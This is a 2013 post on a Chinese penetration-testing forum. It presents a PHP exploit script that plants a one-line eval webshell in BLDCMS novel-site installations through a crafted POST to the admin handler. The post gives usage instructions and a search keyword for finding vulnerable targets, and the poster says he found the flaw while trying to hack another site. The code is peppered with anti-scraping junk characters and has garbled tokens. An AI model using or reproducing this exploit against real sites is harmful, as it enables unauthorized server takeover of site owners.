找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 BLDCMS(白老大小说) Getshell 0day EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2520|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞/ U1 _, y% y" H7 A& V% f6 b
: i. E, _* z; `- h

2 S: r- x5 o) U% c话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
. D% H) K  B; _# r: k. O& y9 U! H& T
* \  ]9 I& W" u8 F3 _既然都有人发了 我就把我之前写好的EXP放出来吧
+ |: `, v4 {6 ^' O , a9 f; V2 S' H+ K
view source print?01.php;">
. w3 T- f4 |* @( p/ @1 Y. `02.<!--?php: f& C9 W2 R! M# Q
03.echo "-------------------------------------------------------------------5 X7 }6 A. ]% c7 Y- [
04. 9 i' o. {6 c' g* F& w( V% \
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP3 y7 I- y5 v6 c: C2 K# b
06. 6 v; ], [& n* e' u
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun9 Y# o7 M% W. }
08. ( m/ x0 Q7 q) K- t9 m1 M1 ^
09.QQ:981009941\r\n                                2013.3.21\r\n            
- U/ l3 i; o- X, `# G7 E  I' P; ?$ q10. & n4 S# _1 \6 q# p6 H
11.
1 @. c% T- P. O: s) |! A12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码" B3 {0 h9 @  B- u. f; I
13.
( {0 h# d  f6 X; |/ w+ q9 O) F14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
8 c" W3 \3 ~- Z/ H- A: L2 u9 U15.
) |4 [' c9 ?! r3 h2 K# j16.--------------------------------------------------------------------\r\n";
" I5 u# Q* v0 ]3 L0 Q& L8 u17.$url=$argv[1];
: H$ x2 v* E$ \/ Z" O* }18.$dir=$argv[2];. v3 G/ ^$ e& g0 ~/ x
19.$pass=$argv[3];
6 e) D4 X9 q) \8 y8 e) Y$ J20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
' n% b! t4 `# o) C' ~6 Z21.if (emptyempty($pass)||emptyempty($url)); _, Y+ S* L' X+ `5 J. F
22.{exit("请输入参数");}
7 {0 C- d9 ?7 V8 F23.else3 h, S1 u: g' R$ ?" T
24.{
4 m& V- N" @# q: D25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev# {) q: I+ a8 {- g+ h
26. 5 w) Y7 d, p  _# w0 t# x4 z7 e
27.al;
2 F$ g5 O, m" }28.$length = strlen($fuckdata);
/ ?0 y! }/ r8 s2 N$ T29.function getshell($url,$pass)
; z2 |: w8 f+ [" u3 H# c5 w4 n30.{
# F2 r( ?0 r5 Q1 w31.global $url,$dir,$pass,$eval,$length,$fuckdata;5 P$ K- q; d% L) r% z& m
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";) Q2 W' B# K" q# g* ]$ f; _$ B
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
6 h4 {% ?- o7 d: Z34.$header .= "User-Agent: MSIE\r\n";% e' j. k' i; _' Q2 i( [6 P$ ^: X
35.$header .= "Host:".$url."\r\n";: b' ^, G! ^, k5 r+ `3 W. C7 L
36.$header .= "Content-Length: ".$length."\r\n";
3 W/ l3 M' c$ e- y( ?37.$header .= "Connection: Close\r\n";4 i# l) x. E4 t- N
38.$header .="\r\n";# @( p- B7 W2 P7 I
39.$header .= $fuckdata."\r\n\r\n";
6 M) D, q/ P5 t! }1 ~40.$fp = fsockopen($url, 80,$errno,$errstr,15);
' z8 J8 v6 U2 M$ ^& \! S. v& S' ]41.if (!$fp)3 m* h/ Y2 k1 N0 k' H: S  N
42.{: p" I2 B) B# _9 G4 f, h) C" v5 i
43.exit ("利用失败:请检查指定目标是否能正常打开");' \. @$ N) [% l% b
44.}: |3 K- Y3 F  P0 C& X
45.else{ if (!fputs($fp,$header))" P3 W: E7 {8 R0 F4 ~
46.{exit ("利用失败");}
+ T9 J% ]+ o" ?7 l. m+ t* L9 Q47.else9 U1 w- e/ c' a0 O$ e( k2 ?# }
48.{
9 O, q7 ~* i+ J9 w3 O5 W0 J49.$receive = '';
, x. [& x6 q& I; L( q9 X50.while (!feof($fp)) {- b  D; [; ^7 J
51.$receive .= @fgets($fp, 1000);
2 @, }+ j0 N1 Z+ G; e3 D* X+ R52.}
3 I2 ~* @6 c( w: e4 t9 a53.@fclose($fp);  P1 ?6 Y8 f9 `# [  J+ A) W
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
/ [. S1 A2 a! K. x55.
# G. M9 w* w" k2 l& A56.GPC是否=off)";
) |. X( V0 e$ c  b) @0 W/ ^57.}}
, Q3 Y+ ^' u* w% T5 y  \% d58.}8 i: o' e8 A; Z$ W# Q
59.}; d8 V6 Z5 y% x6 r% L0 |: f
60.getshell($url,$pass);9 F2 c  v  O, g6 V
61.?-->+ ]1 z" L8 C7 N+ r* b9 n

9 ]( S6 f; k: V. c* T! u& G% O- V  p) F; |2 C" `* {" [/ o2 U; r) E( E
  ?: `4 m& j" m7 [
by 数据流/ `3 i/ {8 ?! B
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表